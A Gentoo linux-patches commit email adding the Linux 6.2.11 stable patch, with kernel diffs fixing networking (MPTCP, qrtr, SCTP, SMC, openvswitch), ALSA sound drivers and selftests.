+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -1192,9 +1192,8 @@ bool mptcp_incoming_options(struct sock *sk, struct sk_buff *skb)
+ 	 */
+ 	if (TCP_SKB_CB(skb)->seq == TCP_SKB_CB(skb)->end_seq) {
+ 		if (mp_opt.data_fin && mp_opt.data_len == 1 &&
+-		    mptcp_update_rcv_data_fin(msk, mp_opt.data_seq, mp_opt.dsn64) &&
+-		    schedule_work(&msk->work))
+-			sock_hold(subflow->conn);
++		    mptcp_update_rcv_data_fin(msk, mp_opt.data_seq, mp_opt.dsn64))
++			mptcp_schedule_work((struct sock *)msk);
+ 
+ 		return true;
+ 	}
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 6c2577b93fd80..0fbcb8f4fd651 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2627,7 +2627,7 @@ static void mptcp_worker(struct work_struct *work)
+ 
+ 	lock_sock(sk);
+ 	state = sk->sk_state;
+-	if (unlikely(state == TCP_CLOSE))
++	if (unlikely((1 << state) & (TCPF_CLOSE | TCPF_LISTEN)))
+ 		goto unlock;
+ 
+ 	mptcp_check_data_fin_ack(sk);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 8f6e48e5db2ce..dbc02c2c57ccc 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -407,9 +407,8 @@ void mptcp_subflow_reset(struct sock *ssk)
+ 
+ 	tcp_send_active_reset(ssk, GFP_ATOMIC);
+ 	tcp_done(ssk);
+-	if (!test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &mptcp_sk(sk)->flags) &&
+-	    schedule_work(&mptcp_sk(sk)->work))
+-		return; /* worker will put sk for us */
++	if (!test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &mptcp_sk(sk)->flags))
++		mptcp_schedule_work(sk);
+ 
+ 	sock_put(sk);
+ }
+@@ -1117,8 +1116,8 @@ static enum mapping_status get_mapping_status(struct sock *ssk,
+ 				skb_ext_del(skb, SKB_EXT_MPTCP);
+ 				return MAPPING_OK;
+ 			} else {
+-				if (updated && schedule_work(&msk->work))
+-					sock_hold((struct sock *)msk);
++				if (updated)
++					mptcp_schedule_work((struct sock *)msk);
+ 
+ 				return MAPPING_DATA_FIN;
+ 			}
+@@ -1221,17 +1220,12 @@ static void mptcp_subflow_discard_data(struct sock *ssk, struct sk_buff *skb,
+ /* sched mptcp worker to remove the subflow if no more data is pending */
+ static void subflow_sched_work_if_closed(struct mptcp_sock *msk, struct sock *ssk)
+ {
+-	struct sock *sk = (struct sock *)msk;
+-
+ 	if (likely(ssk->sk_state != TCP_CLOSE))
+ 		return;
+ 
+ 	if (skb_queue_empty(&ssk->sk_receive_queue) &&
+-	    !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags)) {
+-		sock_hold(sk);
+-		if (!schedule_work(&msk->work))
+-			sock_put(sk);
+-	}
++	    !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
++		mptcp_schedule_work((struct sock *)msk);
+ }
+ 
+ static bool subflow_can_fallback(struct mptcp_subflow_context *subflow)
+diff --git a/net/openvswitch/actions.c b/net/openvswitch/actions.c
+index ca3ebfdb30231..a8cf9a88758ef 100644
+--- a/net/openvswitch/actions.c
++++ b/net/openvswitch/actions.c
+@@ -913,7 +913,7 @@ static void do_output(struct datapath *dp, struct sk_buff *skb, int out_port,
+ {
+ 	struct vport *vport = ovs_vport_rcu(dp, out_port);
+ 
+-	if (likely(vport)) {
++	if (likely(vport && netif_carrier_ok(vport->dev))) {
+ 		u16 mru = OVS_CB(skb)->mru;
+ 		u32 cutlen = OVS_CB(skb)->cutlen;
+ 
+diff --git a/net/qrtr/af_qrtr.c b/net/qrtr/af_qrtr.c
+index 3a70255c8d02f..76f0434d3d06a 100644
+--- a/net/qrtr/af_qrtr.c
++++ b/net/qrtr/af_qrtr.c
+@@ -498,6 +498,11 @@ int qrtr_endpoint_post(struct qrtr_endpoint *ep, const void *data, size_t len)
+ 	if (!size || len != ALIGN(size, 4) + hdrlen)
+ 		goto err;
+ 
++	if ((cb->type == QRTR_TYPE_NEW_SERVER ||
++	     cb->type == QRTR_TYPE_RESUME_TX) &&
++	    size < sizeof(struct qrtr_ctrl_pkt))
++		goto err;
++
+ 	if (cb->dst_port != QRTR_PORT_CTRL && cb->type != QRTR_TYPE_DATA &&
+ 	    cb->type != QRTR_TYPE_RESUME_TX)
+ 		goto err;
+@@ -510,9 +515,6 @@ int qrtr_endpoint_post(struct qrtr_endpoint *ep, const void *data, size_t len)
+ 		/* Remote node endpoint can bridge other distant nodes */
+ 		const struct qrtr_ctrl_pkt *pkt;
+ 
+-		if (size < sizeof(*pkt))
+-			goto err;
+-
+ 		pkt = data + hdrlen;
+ 		qrtr_node_assign(node, le32_to_cpu(pkt->server.node));
+ 	}
+diff --git a/net/sctp/stream_interleave.c b/net/sctp/stream_interleave.c
+index 94727feb07b3e..b046b11200c93 100644
+--- a/net/sctp/stream_interleave.c
++++ b/net/sctp/stream_interleave.c
+@@ -1154,7 +1154,8 @@ static void sctp_generate_iftsn(struct sctp_outq *q, __u32 ctsn)
+ 
+ #define _sctp_walk_ifwdtsn(pos, chunk, end) \
+ 	for (pos = chunk->subh.ifwdtsn_hdr->skip; \
+-	     (void *)pos < (void *)chunk->subh.ifwdtsn_hdr->skip + (end); pos++)
++	     (void *)pos <= (void *)chunk->subh.ifwdtsn_hdr->skip + (end) - \
++			    sizeof(struct sctp_ifwdtsn_skip); pos++)
+ 
+ #define sctp_walk_ifwdtsn(pos, ch) \
+ 	_sctp_walk_ifwdtsn((pos), (ch), ntohs((ch)->chunk_hdr->length) - \
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index e8018b0fb7676..bdeaee727538d 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -3257,6 +3257,17 @@ static int __smc_create(struct net *net, struct socket *sock, int protocol,
+ 			sk_common_release(sk);
+ 			goto out;
+ 		}
++
++		/* smc_clcsock_release() does not wait for smc->clcsock->sk's
++		 * destruction; its sk_state might not be TCP_CLOSE after
++		 * smc->sk is close()d, and TCP timers can fire later,
++		 * which need the net ref.
++		 */
++		sk = smc->clcsock->sk;
++		__netns_tracker_free(net, &sk->ns_tracker, false);
++		sk->sk_net_refcnt = 1;
++		get_net_track(net, &sk->ns_tracker, GFP_KERNEL);
++		sock_inuse_add(net, 1);
+ 	} else {
+ 		smc->clcsock = clcsock;
+ 	}
+diff --git a/sound/firewire/tascam/tascam-stream.c b/sound/firewire/tascam/tascam-stream.c
+index 53e094cc411f8..dfe783d01d7d2 100644
+--- a/sound/firewire/tascam/tascam-stream.c
++++ b/sound/firewire/tascam/tascam-stream.c
+@@ -490,7 +490,7 @@ int snd_tscm_stream_start_duplex(struct snd_tscm *tscm, unsigned int rate)
+ 		// packet is important for media clock recovery.
+ 		err = amdtp_domain_start(&tscm->domain, tx_init_skip_cycles, true, true);
+ 		if (err < 0)
+-			return err;
++			goto error;
+ 
+ 		if (!amdtp_domain_wait_ready(&tscm->domain, READY_TIMEOUT_MS)) {
+ 			err = -ETIMEDOUT;
+diff --git a/sound/i2c/cs8427.c b/sound/i2c/cs8427.c
+index 65012af6a36e4..f58b14b490455 100644
+--- a/sound/i2c/cs8427.c
++++ b/sound/i2c/cs8427.c
+@@ -561,10 +561,13 @@ int snd_cs8427_iec958_active(struct snd_i2c_device *cs8427, int active)
+ 	if (snd_BUG_ON(!cs8427))
+ 		return -ENXIO;
+ 	chip = cs8427->private_data;
+-	if (active)
++	if (active) {
+ 		memcpy(chip->playback.pcm_status,
+ 		       chip->playback.def_status, 24);
+-	chip->playback.pcm_ctl->vd[0].access &= ~SNDRV_CTL_ELEM_ACCESS_INACTIVE;
++		chip->playback.pcm_ctl->vd[0].access &= ~SNDRV_CTL_ELEM_ACCESS_INACTIVE;
++	} else {
++		chip->playback.pcm_ctl->vd[0].access |= SNDRV_CTL_ELEM_ACCESS_INACTIVE;
++	}
+ 	snd_ctl_notify(cs8427->bus->card,
+ 		       SNDRV_CTL_EVENT_MASK_VALUE | SNDRV_CTL_EVENT_MASK_INFO,
+ 		       &chip->playback.pcm_ctl->id);
+diff --git a/sound/pci/emu10k1/emupcm.c b/sound/pci/emu10k1/emupcm.c
+index 48af77ae8020f..6ec394fb18468 100644
+--- a/sound/pci/emu10k1/emupcm.c
++++ b/sound/pci/emu10k1/emupcm.c
+@@ -1236,7 +1236,7 @@ static int snd_emu10k1_capture_mic_close(struct snd_pcm_substream *substream)
+ {
+ 	struct snd_emu10k1 *emu = snd_pcm_substream_chip(substream);
+ 
+-	emu->capture_interrupt = NULL;
++	emu->capture_mic_interrupt = NULL;
+ 	emu->pcm_capture_mic_substream = NULL;
+ 	return 0;
+ }
+@@ -1344,7 +1344,7 @@ static int snd_emu10k1_capture_efx_close(struct snd_pcm_substream *substream)
+ {
+ 	struct snd_emu10k1 *emu = snd_pcm_substream_chip(substream);
+ 
+-	emu->capture_interrupt = NULL;
++	emu->capture_efx_interrupt = NULL;
+ 	emu->pcm_capture_efx_substream = NULL;
+ 	return 0;
+ }
+@@ -1781,17 +1781,21 @@ int snd_emu10k1_pcm_efx(struct snd_emu10k1 *emu, int device)
+ 	struct snd_kcontrol *kctl;
+ 	int err;
+ 
+-	err = snd_pcm_new(emu->card, "emu10k1 efx", device, 8, 1, &pcm);
++	err = snd_pcm_new(emu->card, "emu10k1 efx", device, emu->audigy ? 0 : 8, 1, &pcm);
+ 	if (err < 0)
+ 		return err;
+ 
+ 	pcm->private_data = emu;
+ 
+-	snd_pcm_set_ops(pcm, SNDRV_PCM_STREAM_PLAYBACK, &snd_emu10k1_fx8010_playback_ops);
++	if (!emu->audigy)
++		snd_pcm_set_ops(pcm, SNDRV_PCM_STREAM_PLAYBACK, &snd_emu10k1_fx8010_playback_ops);
+ 	snd_pcm_set_ops(pcm, SNDRV_PCM_STREAM_CAPTURE, &snd_emu10k1_capture_efx_ops);
+ 
+ 	pcm->info_flags = 0;
+-	strcpy(pcm->name, "Multichannel Capture/PT Playback");
++	if (emu->audigy)
++		strcpy(pcm->name, "Multichannel Capture");
++	else
++		strcpy(pcm->name, "Multichannel Capture/PT Playback");
+ 	emu->pcm_efx = pcm;
+ 
+ 	/* EFX capture - record the "FXBUS2" channels, by default we connect the EXTINs 
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 4ffa3a59f419f..5c6980394dcec 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -4604,7 +4604,7 @@ HDA_CODEC_ENTRY(0x80862814, "DG1 HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x80862815, "Alderlake HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x80862816, "Rocketlake HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x80862818, "Raptorlake HDMI",	patch_i915_tgl_hdmi),
+-HDA_CODEC_ENTRY(0x80862819, "DG2 HDMI",	patch_i915_adlp_hdmi),
++HDA_CODEC_ENTRY(0x80862819, "DG2 HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x8086281a, "Jasperlake HDMI",	patch_i915_icl_hdmi),
+ HDA_CODEC_ENTRY(0x8086281b, "Elkhartlake HDMI",	patch_i915_icl_hdmi),
+ HDA_CODEC_ENTRY(0x8086281c, "Alderlake-P HDMI", patch_i915_adlp_hdmi),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 50b8573b52066..6a6c72b5ea26d 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -6960,6 +6960,8 @@ enum {
+ 	ALC269_FIXUP_DELL_M101Z,
+ 	ALC269_FIXUP_SKU_IGNORE,
+ 	ALC269_FIXUP_ASUS_G73JW,
++	ALC269_FIXUP_ASUS_N7601ZM_PINS,
++	ALC269_FIXUP_ASUS_N7601ZM,
+ 	ALC269_FIXUP_LENOVO_EAPD,
+ 	ALC275_FIXUP_SONY_HWEQ,
+ 	ALC275_FIXUP_SONY_DISABLE_AAMIX,
+@@ -7256,6 +7258,29 @@ static const struct hda_fixup alc269_fixups[] = {
+ 			{ }
+ 		}
+ 	},
++	[ALC269_FIXUP_ASUS_N7601ZM_PINS] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x19, 0x03A11050 },
++			{ 0x1a, 0x03A11C30 },
++			{ 0x21, 0x03211420 },
++			{ }
++		}
++	},
++	[ALC269_FIXUP_ASUS_N7601ZM] = {
++		.type = HDA_FIXUP_VERBS,
++		.v.verbs = (const struct hda_verb[]) {
++			{0x20, AC_VERB_SET_COEF_INDEX, 0x62},
++			{0x20, AC_VERB_SET_PROC_COEF, 0xa007},
++			{0x20, AC_VERB_SET_COEF_INDEX, 0x10},
++			{0x20, AC_VERB_SET_PROC_COEF, 0x8420},
++			{0x20, AC_VERB_SET_COEF_INDEX, 0x0f},
++			{0x20, AC_VERB_SET_PROC_COEF, 0x7774},
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC269_FIXUP_ASUS_N7601ZM_PINS,
++	},
+ 	[ALC269_FIXUP_LENOVO_EAPD] = {
+ 		.type = HDA_FIXUP_VERBS,
+ 		.v.verbs = (const struct hda_verb[]) {
+@@ -9465,6 +9490,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1271, "ASUS X430UN", ALC256_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x1290, "ASUS X441SA", ALC233_FIXUP_EAPD_COEF_AND_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x12a0, "ASUS X441UV", ALC233_FIXUP_EAPD_COEF_AND_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1043, 0x12a3, "Asus N7691ZM", ALC269_FIXUP_ASUS_N7601ZM),
+ 	SND_PCI_QUIRK(0x1043, 0x12af, "ASUS UX582ZS", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x12e0, "ASUS X541SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x12f0, "ASUS X541UV", ALC256_FIXUP_ASUS_MIC),
+@@ -9662,6 +9688,9 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x30bb, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x30e2, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x310c, "ThinkCentre Station", ALC294_FIXUP_LENOVO_MIC_LOCATION),
+diff --git a/sound/pci/hda/patch_sigmatel.c b/sound/pci/hda/patch_sigmatel.c
+index a794a01a68ca6..61258b0aac8d6 100644
+--- a/sound/pci/hda/patch_sigmatel.c
++++ b/sound/pci/hda/patch_sigmatel.c
+@@ -1707,6 +1707,7 @@ static const struct snd_pci_quirk stac925x_fixup_tbl[] = {
+ };
+ 
+ static const struct hda_pintbl ref92hd73xx_pin_configs[] = {
++	// Port A-H
+ 	{ 0x0a, 0x02214030 },
+ 	{ 0x0b, 0x02a19040 },
+ 	{ 0x0c, 0x01a19020 },
+@@ -1715,9 +1716,12 @@ static const struct hda_pintbl ref92hd73xx_pin_configs[] = {
+ 	{ 0x0f, 0x01014010 },
+ 	{ 0x10, 0x01014020 },
+ 	{ 0x11, 0x01014030 },
++	// CD in
+ 	{ 0x12, 0x02319040 },
++	// Digital Mic ins
+ 	{ 0x13, 0x90a000f0 },
+ 	{ 0x14, 0x90a000f0 },
++	// Digital outs
+ 	{ 0x22, 0x01452050 },
+ 	{ 0x23, 0x01452050 },
+ 	{}
+@@ -1758,6 +1762,7 @@ static const struct hda_pintbl alienware_m17x_pin_configs[] = {
+ };
+ 
+ static const struct hda_pintbl intel_dg45id_pin_configs[] = {
++	// Analog outputs
+ 	{ 0x0a, 0x02214230 },
+ 	{ 0x0b, 0x02A19240 },
+ 	{ 0x0c, 0x01013214 },
+@@ -1765,6 +1770,9 @@ static const struct hda_pintbl intel_dg45id_pin_configs[] = {
+ 	{ 0x0e, 0x01A19250 },
+ 	{ 0x0f, 0x01011212 },
+ 	{ 0x10, 0x01016211 },
++	// Digital output
++	{ 0x22, 0x01451380 },
++	{ 0x23, 0x40f000f0 },
+ 	{}
+ };
+ 
+@@ -1955,6 +1963,8 @@ static const struct snd_pci_quirk stac92hd73xx_fixup_tbl[] = {
+ 				"DFI LanParty", STAC_92HD73XX_REF),
+ 	SND_PCI_QUIRK(PCI_VENDOR_ID_DFI, 0x3101,
+ 				"DFI LanParty", STAC_92HD73XX_REF),
++	SND_PCI_QUIRK(PCI_VENDOR_ID_INTEL, 0x5001,
++				"Intel DP45SG", STAC_92HD73XX_INTEL),
+ 	SND_PCI_QUIRK(PCI_VENDOR_ID_INTEL, 0x5002,
+ 				"Intel DG45ID", STAC_92HD73XX_INTEL),
+ 	SND_PCI_QUIRK(PCI_VENDOR_ID_INTEL, 0x5003,
+diff --git a/tools/testing/radix-tree/maple.c b/tools/testing/radix-tree/maple.c
+index 1f36bc1c5d362..2a16939cf0285 100644
+--- a/tools/testing/radix-tree/maple.c
++++ b/tools/testing/radix-tree/maple.c
+@@ -108,6 +108,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mn->slot[1] != NULL);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+ 
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 	mas.node = MAS_START;
+ 	mas_nomem(&mas, GFP_KERNEL);
+@@ -160,6 +161,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != i);
+ 		MT_BUG_ON(mt, !mn);
+ 		MT_BUG_ON(mt, not_empty(mn));
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 	}
+ 
+@@ -192,6 +194,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		MT_BUG_ON(mt, not_empty(mn));
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != i - 1);
+ 		MT_BUG_ON(mt, !mn);
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 	}
+ 
+@@ -210,6 +213,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			mn = mas_pop_node(&mas);
+ 			MT_BUG_ON(mt, not_empty(mn));
+ 			MT_BUG_ON(mt, mas_allocated(&mas) != j - 1);
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 		}
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+@@ -233,6 +237,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			MT_BUG_ON(mt, mas_allocated(&mas) != i - j);
+ 			mn = mas_pop_node(&mas);
+ 			MT_BUG_ON(mt, not_empty(mn));
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 			MT_BUG_ON(mt, mas_allocated(&mas) != i - j - 1);
+ 		}
+@@ -269,6 +274,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			mn = mas_pop_node(&mas); /* get the next node. */
+ 			MT_BUG_ON(mt, mn == NULL);
+ 			MT_BUG_ON(mt, not_empty(mn));
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 		}
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+@@ -294,6 +300,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			mn = mas_pop_node(&mas2); /* get the next node. */
+ 			MT_BUG_ON(mt, mn == NULL);
+ 			MT_BUG_ON(mt, not_empty(mn));
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 		}
+ 		MT_BUG_ON(mt, mas_allocated(&mas2) != 0);
+@@ -334,10 +341,12 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 2);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, not_empty(mn));
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 	for (i = 1; i <= MAPLE_ALLOC_SLOTS + 1; i++) {
+ 		mn = mas_pop_node(&mas);
+ 		MT_BUG_ON(mt, not_empty(mn));
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 	}
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+@@ -375,6 +384,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		mas_node_count(&mas, i); /* Request */
+ 		mas_nomem(&mas, GFP_KERNEL); /* Fill request */
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mas_destroy(&mas);
+ 
+@@ -382,10 +392,13 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		mas_node_count(&mas, i); /* Request */
+ 		mas_nomem(&mas, GFP_KERNEL); /* Fill request */
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mas_destroy(&mas);
+ 	}
+@@ -35369,6 +35382,7 @@ static noinline void check_prealloc(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, allocated != 1 + height * 3);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != allocated - 1);
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 	MT_BUG_ON(mt, mas_preallocate(&mas, ptr, GFP_KERNEL) != 0);
+ 	mas_destroy(&mas);
+@@ -35386,6 +35400,7 @@ static noinline void check_prealloc(struct maple_tree *mt)
+ 	mas_destroy(&mas);
+ 	allocated = mas_allocated(&mas);
+ 	MT_BUG_ON(mt, allocated != 0);
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 
+ 	MT_BUG_ON(mt, mas_preallocate(&mas, ptr, GFP_KERNEL) != 0);
+@@ -35756,6 +35771,7 @@ void farmer_tests(void)
+ 	tree.ma_root = mt_mk_node(node, maple_leaf_64);
+ 	mt_dump(&tree);
+ 
++	node->parent = ma_parent_ptr(node);
+ 	ma_free_rcu(node);
+ 
+ 	/* Check things that will make lockdep angry */
+diff --git a/tools/testing/selftests/bpf/progs/find_vma_fail1.c b/tools/testing/selftests/bpf/progs/find_vma_fail1.c
+index b3b326b8e2d1c..6dab9cffda132 100644
+--- a/tools/testing/selftests/bpf/progs/find_vma_fail1.c
++++ b/tools/testing/selftests/bpf/progs/find_vma_fail1.c
+@@ -2,6 +2,7 @@
+ /* Copyright (c) 2021 Facebook */
+ #include "vmlinux.h"
+ #include <bpf/bpf_helpers.h>
++#define vm_flags vm_start
+ 
+ char _license[] SEC("license") = "GPL";
+ 
+diff --git a/tools/testing/selftests/net/config b/tools/testing/selftests/net/config
+index bd89198cd8176..84833cb491998 100644
+--- a/tools/testing/selftests/net/config
++++ b/tools/testing/selftests/net/config
+@@ -45,3 +45,4 @@ CONFIG_BAREUDP=m
+ CONFIG_IPV6_IOAM6_LWTUNNEL=y
+ CONFIG_CRYPTO_SM4_GENERIC=y
+ CONFIG_AMT=m
++CONFIG_IP_SCTP=m
+diff --git a/tools/testing/selftests/net/mptcp/userspace_pm.sh b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+index ab2d581f28a1d..c61f3aea66caf 100755
+--- a/tools/testing/selftests/net/mptcp/userspace_pm.sh
++++ b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+@@ -884,6 +884,7 @@ test_listener()
+ 		$client4_port > /dev/null 2>&1 &
+ 	local listener_pid=$!
+ 
++	sleep 0.5
+ 	verify_listener_events $client_evts $LISTENER_CREATED $AF_INET 10.0.2.2 $client4_port
+ 
+ 	# ADD_ADDR from client to server machine reusing the subflow port
+@@ -899,6 +900,7 @@ test_listener()
+ 	# Delete the listener from the client ns, if one was created
+ 	kill_wait $listener_pid
+ 
++	sleep 0.5
+ 	verify_listener_events $client_evts $LISTENER_CLOSED $AF_INET 10.0.2.2 $client4_port
+ }
+ 
+diff --git a/tools/testing/selftests/net/openvswitch/ovs-dpctl.py b/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
+index 3243c90d449e6..5d467d1993cb1 100644
+--- a/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
++++ b/tools/testing/selftests/net/openvswitch/ovs-dpctl.py
+@@ -62,7 +62,7 @@ class OvsDatapath(GenericNetlinkSocket):
+         nla_map = (
+             ("OVS_DP_ATTR_UNSPEC", "none"),
+             ("OVS_DP_ATTR_NAME", "asciiz"),
+-            ("OVS_DP_ATTR_UPCALL_PID", "uint32"),
++            ("OVS_DP_ATTR_UPCALL_PID", "array(uint32)"),
+             ("OVS_DP_ATTR_STATS", "dpstats"),
+             ("OVS_DP_ATTR_MEGAFLOW_STATS", "megaflowstats"),
+             ("OVS_DP_ATTR_USER_FEATURES", "uint32"),


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-04-13 16:08 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-04-13 16:08 UTC (permalink / raw
  To: gentoo-commits

commit:     cd6cc577187a06e6012d8bdf191e1368c8aa348b
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Apr 13 16:08:32 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Apr 13 16:08:32 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=cd6cc577

Linux patch 6.2.11

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1010_linux-6.2.11.patch | 13594 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 13598 insertions(+)

diff --git a/0000_README b/0000_README
index 93bcb21e..eb41631d 100644
--- a/0000_README
+++ b/0000_README
@@ -83,6 +83,10 @@ Patch:  1009_linux-6.2.10.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.10
 
+Patch:  1010_linux-6.2.11.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.11
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1010_linux-6.2.11.patch b/1010_linux-6.2.11.patch
new file mode 100644
index 00000000..484b212a
--- /dev/null
+++ b/1010_linux-6.2.11.patch
@@ -0,0 +1,13594 @@
+diff --git a/Documentation/devicetree/bindings/serial/renesas,scif.yaml b/Documentation/devicetree/bindings/serial/renesas,scif.yaml
+index f81f2d67a1ed4..38391a5d96bfe 100644
+--- a/Documentation/devicetree/bindings/serial/renesas,scif.yaml
++++ b/Documentation/devicetree/bindings/serial/renesas,scif.yaml
+@@ -92,7 +92,7 @@ properties:
+           - description: Error interrupt
+           - description: Receive buffer full interrupt
+           - description: Transmit buffer empty interrupt
+-          - description: Transmit End interrupt
++          - description: Break interrupt
+       - items:
+           - description: Error interrupt
+           - description: Receive buffer full interrupt
+@@ -107,7 +107,7 @@ properties:
+           - const: eri
+           - const: rxi
+           - const: txi
+-          - const: tei
++          - const: bri
+       - items:
+           - const: eri
+           - const: rxi
+diff --git a/Documentation/mm/zsmalloc.rst b/Documentation/mm/zsmalloc.rst
+index 6e79893d61326..d98607aa9c1fd 100644
+--- a/Documentation/mm/zsmalloc.rst
++++ b/Documentation/mm/zsmalloc.rst
+@@ -68,6 +68,8 @@ pages_used
+ 	the number of pages allocated for the class
+ pages_per_zspage
+ 	the number of 0-order pages to make a zspage
++freeable
++	the approximate number of pages class compaction can free
+ 
+ We assign a zspage to ZS_ALMOST_EMPTY fullness group when n <= N / f, where
+ 
+diff --git a/Makefile b/Makefile
+index 6ec0ec452e465..416490daa76ad 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 10
